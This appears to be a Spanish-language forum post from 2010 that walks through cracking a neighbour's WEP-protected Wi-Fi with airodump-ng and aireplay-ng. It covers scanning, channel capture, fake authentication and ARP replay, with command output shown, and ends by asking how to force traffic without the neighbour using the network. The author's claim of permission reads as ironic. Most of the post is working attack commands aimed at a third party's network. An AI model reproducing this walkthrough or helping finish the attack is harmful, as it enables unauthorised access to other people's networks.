ATAQUE WIFI BÁSICO
Hola a todos, hoy me he propuesto crackear la contraseña del wifi, de mi vecino, que por supuesto tengo permiso, me he informado, he leido, he estudiado y he llegado a la conclusion del siguiente ataque:
Primero de todo analizo el perimetro de redes wifi:
airodump-ng mon0
Código:
CH 11 ][ Elapsed: 1 min ][ 2010-06-24 17:22
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:___________ -49 33 29 0 1 54e. WEP WEP OPN WLAN_____
00:15:___________-82 46 0 0 11 54 WEP WEP Jazztel ______
BSSID STATION PWR Rate Lost Packets Probes
00:22:___________ 00:08:___________ 0 1e- 1e 606 156 WLAN______
Bieeen tengo la red que yo queria crackear, en mi caso Jazztel _____, por tanto me centro en su canal de comunicacion:
airodump-ng -w wep -c 11 --bssid 00:15:___________ mon0
Y empiezo a ver sus datos concretos:
Código:
CH 11 ][ Elapsed: 5 mins ][ 2010-06-24 17:29 ][ fixed channel mon0: 1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:___________ -80 4 1830 0 0 11 54 WEP WEP OPN Jazztel ___
BSSID STATION PWR Rate Lost Packets Probes
00:15:___________ 00:08:___________ 0 1 - 1 0 9
Ahora empieza el ataque para comenzar a capturar paquetes, para lo cual, primero tengo que inyectarle y hacer una autentificación falsa:
aireplay-ng -1 0 -a 00:15:___________ mon0
Y la asociacion de AP transcurre satisfactoriamente:
Código:
No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:28:02 Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
17:28:02 Sending Authentication Request (Open System) [ACK]
17:28:02 Authentication successful
17:28:02 Sending Association Request [ACK]
17:28:02 Association successful :-) (AID: 1)
Ahora empieza la captura de trafico y arp:
aireplay-ng -3 -b 00:15:___________ mon0
Código:
No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:25:46 Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
Saving ARP requests in replay_arp-0624-172546.cap
You should also start airodump-ng to capture replies.
2007 packets (got 0 ARP requests and 20 ACKs), sent 0 packets...(0 pps)
Y por mucho que espero no suben los data, estudiando la situación he llegado a la conclusion de que esto ocurre porque no hay ningun cliente asociado que genere trafico de red, y creo que eso se hace en el punto dos de mi ataque, lo que ocurre es que me autentifico falso y al rato me kickea de la falsa autentificación.
Esto es una guia de ataque básico y al mismo tiempo mi duda.
Alguien sabe como puedo solventar este problema sin tener que esperar a que mi vecino empieze a navegar/descargar, en general usar su red?
Saludos y gracias por vuestra atención.